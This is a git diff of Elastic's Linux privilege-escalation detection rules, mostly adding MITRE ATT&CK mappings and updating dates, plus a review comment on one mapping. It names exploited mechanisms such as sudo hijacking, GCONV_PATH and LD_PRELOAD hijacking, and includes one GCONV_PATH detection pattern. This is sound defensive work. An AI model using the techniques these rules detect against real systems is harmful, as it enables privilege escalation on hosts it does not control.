diff --git a/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml b/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml index 94a0637e997..22e78454d57 100644 --- a/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml +++ b/rules/linux/privilege_escalation_debugfs_launched_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -113,3 +113,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_docker_release_file_creation.toml b/rules/linux/privilege_escalation_docker_release_file_creation.toml index 13bfdf602c9..e919be74c9a 100644 --- a/rules/linux/privilege_escalation_docker_release_file_creation.toml +++ b/rules/linux/privilege_escalation_docker_release_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,6 +78,11 @@ not process.executable in ("/usr/bin/podman", "/sbin/sos", "/sbin/sosreport", "/ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1611" name = "Escape to Host" 
@@ -87,3 +92,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml index 163762f1cb3..4d7848f815a 100644 --- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml +++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,14 +102,23 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml index d9f136f68e5..8de88108c11 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml 
+++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,24 +104,28 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml index b03edb7d5b6..8e85be5293b 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -106,53 +106,72 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.008" +name = "Ptrace System Calls" +reference = "https://attack.mitre.org/techniques/T1055/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml index 5c695d128cc..f82fe71622b 100644 --- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml +++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -102,31 +102,41 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.013" name = "KernelCallbackTable" reference = "https://attack.mitre.org/techniques/T1574/013/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1014" name = "Rootkit" reference = "https://attack.mitre.org/techniques/T1014/" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index 046ac09030c..88dcfc8a949 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml 
@@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -129,6 +129,41 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml index af3b13bbbe3..7b6c41b148e 100644 --- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml +++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -122,6 +122,11 @@ id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -144,3 +149,29 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml index e2af607fc77..247f7568715 100644 --- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml +++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -153,6 +153,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [[rule.threat.technique]] id = "T1601" name = "Modify System Image" diff --git a/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml b/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml index 7f703f3cf39..8a26e54fea9 100644 --- a/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml +++ b/rules/linux/privilege_escalation_looney_tunables_cve_2023_4911.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,14 +114,23 @@ CVE-2023-4911 exploits a buffer overflow in the GNU C Library's dynamic loader, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_overlayfs_local_privesc.toml b/rules/linux/privilege_escalation_overlayfs_local_privesc.toml index c7b540738b2..fa85b1fcacc 100644 --- a/rules/linux/privilege_escalation_overlayfs_local_privesc.toml +++ b/rules/linux/privilege_escalation_overlayfs_local_privesc.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,14 +105,18 @@ OverlayFS is a union filesystem used in Linux environments to overlay one filesy [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 9df3d417f82..bbffa62b3bf 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -100,31 +100,46 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [[rule.threat.technique.subtechnique]] id = "T1574.007" name = "Path Interception by PATH Environment Variable" reference = "https://attack.mitre.org/techniques/T1574/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml index f7d626e37d7..3b93dd57a3c 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -168,3 +168,21 @@ framework = "MITRE ATT&CK" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml index 6073256d5ec..04869b7baed 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -156,12 +156,22 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml index c214967001f..c2e9257195e 100644 --- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml +++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -131,6 +131,16 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml index d916e1256e9..f7950400278 100644 --- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml +++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
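Review bot: In the potential_wildcard_shell_spawn section the new technique `id = "T1203"` / `name = "Exploitation for Client Execution"` looks like a questionable fit: T1203 covers exploitation of vulnerabilities in client-side software, whereas shell spawns driven by wildcard expansion in a privileged command are argument/feature abuse rather than a client-application exploit, and the already-present T1059.004 Unix Shell mapping seems to capture the behavior. The enclosing `[[rule.threat]]` header and the rule's description are outside this hunk, so confirm against the rule text before dropping it; if T1203 stays, a one-line comment above the block explaining the intended exploitation angle would help the next reviewer, e.g. `# T1203: wildcard injection abuses a privileged command's argument handling`.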
@@ -117,3 +117,29 @@ reference = "https://attack.mitre.org/techniques/T1078/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml b/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml index 84c02d17563..789d6a14b7c 100644 --- a/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml +++ b/rules/linux/privilege_escalation_snap_confine_lpe_via_cve_2026_3888.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml index c90a6990fbb..c7384b9670d 100644 --- a/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml +++ b/rules/linux/privilege_escalation_sudo_cve_2019_14287.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml index b137cf4d019..5d26914be44 100644 --- a/rules/linux/privilege_escalation_sudo_hijacking.toml +++ b/rules/linux/privilege_escalation_sudo_hijacking.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,6 +133,11 @@ id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -150,3 +155,16 @@ reference = "https://attack.mitre.org/techniques/T1574/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" 
diff --git a/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml b/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml index 5ea5e75e9e2..feb099acfe7 100644 --- a/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml +++ b/rules/linux/privilege_escalation_sudo_token_via_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -103,29 +103,56 @@ sequence by host.id, process.session_leader.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.008" +name = "Ptrace System Calls" +reference = "https://attack.mitre.org/techniques/T1055/008/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml index a679ec48580..a15937e4c28 100644 --- a/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml +++ b/rules/linux/privilege_escalation_suspicious_cap_setuid_python_execution.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml index 0035cfea05d..c6754a242a6 100644 --- a/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml +++ b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -109,14 +109,36 @@ In Linux, CAP_CHOWN and CAP_FOWNER are capabilities that allow processes to chan [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml index 923962a5d96..20c3a9c7a7c 100644 --- a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml +++ b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/22" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
